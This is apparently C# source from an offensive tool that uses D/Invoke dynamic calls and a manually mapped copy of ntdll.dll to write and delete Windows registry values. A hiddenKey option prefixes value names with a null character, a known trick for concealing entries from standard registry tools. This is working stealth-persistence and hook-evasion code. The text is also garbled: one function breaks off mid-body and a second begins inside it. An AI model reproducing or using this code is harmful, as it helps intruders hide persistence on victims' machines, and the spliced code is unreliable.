public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
STRUCTS.ACCESS_MASK desiredAccess,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
object[] funcargs =
{
keyHandle, desiredAccess, objectAttributes
};
DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs);
keyHandle = (IntPtr)funcargs[0];
return(retvalue);
}
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");
try
{
if (hive == "HKLM")
{
hive = @"\Registry\Machine";
}
else if (hive == "HKCU")
{
String sid = WindowsIdentity.GetCurrent().User.ToString();
hive = @"\Registry\User\" + sid;
}
else
{
throw new Exception("Hive needs to be either HKLM or HKCU");
}
if (hiddenKey)
{
keyName = "\0" + keyName;
}
String regKey = hive + subKey;
IntPtr keyHandle = IntPtr.Zero;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
string SID = WindowsIdentity.GetCurrent().User.ToString();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
oa.Length = Marshal.SizeOf(oa);
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
oa.objectName = oaObjectName;
oa.SecurityDescriptor = IntPtr.Zero;
oa.SecurityQualityOfService = IntPtr.Zero;
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
ref IntPtr rkeyHandle = ref keyHandle;
STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
public static void DRegHide(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
try
{
if (hive == "HKLM")
{
hive = @"\Registry\Machine";
}
else if (hive == "HKCU")
{
String sid = WindowsIdentity.GetCurrent().User.ToString();
hive = @"\Registry\User\" + sid;
}
else
{
throw new Exception("Hive needs to be either HKLM or HKCU");
}
if (hiddenKey)
{
keyName = "\0" + keyName;
}
String regKey = hive + subKey;
IntPtr keyHandle = IntPtr.Zero;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
string SID = WindowsIdentity.GetCurrent().User.ToString();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
oa.Length = Marshal.SizeOf(oa);
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
oa.objectName = oaObjectName;
oa.SecurityDescriptor = IntPtr.Zero;
oa.SecurityQualityOfService = IntPtr.Zero;
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
retValue = TinyDinvoke.NtOpenKey(ref keyHandle, STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS, ref oa);
if (retValue == DInvoke.Data.Native.NTSTATUS.Success)
{
Console.WriteLine("Handle to " + hive + " succesfully opened!");
String keyValueName = keyName;
String keyValueData = keyValue;
DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueName = new DInvoke.Data.Native.UNICODE_STRING();
DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueData = new DInvoke.Data.Native.UNICODE_STRING();
if (!hiddenKey)
{
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueName, keyValueName);
}
else
{
UC_RegKeyValueName.Length = (ushort)(keyValueName.Length * 2);
UC_RegKeyValueName.MaximumLength = (ushort)(keyValueName.Length * 2);
UC_RegKeyValueName.Buffer = Marshal.StringToCoTaskMemUni(keyValueName);
}
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueData, keyValueData);
if (!deleteKey)
{
retValue = TinyDinvoke.NtSetValueKey(keyHandle, ref UC_RegKeyValueName, 0, STRUCTS.REGISTRY_TYPES.REG_SZ, UC_RegKeyValueData.Buffer, UC_RegKeyValueData.Length);
if (retValue == DInvoke.Data.Native.NTSTATUS.Success)
{
Console.WriteLine("RegKey successfully set");
}
}
else
{
retValue = TinyDinvoke.NtDeleteValueKey(keyHandle, ref UC_RegKeyValueName);
Console.WriteLine("key deletion status: " + retValue);
}
Marshal.FreeHGlobal(oa.objectName);
TinyDinvoke.NtClose(keyHandle);
}
else
{
Console.WriteLine("Regkey not found");
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
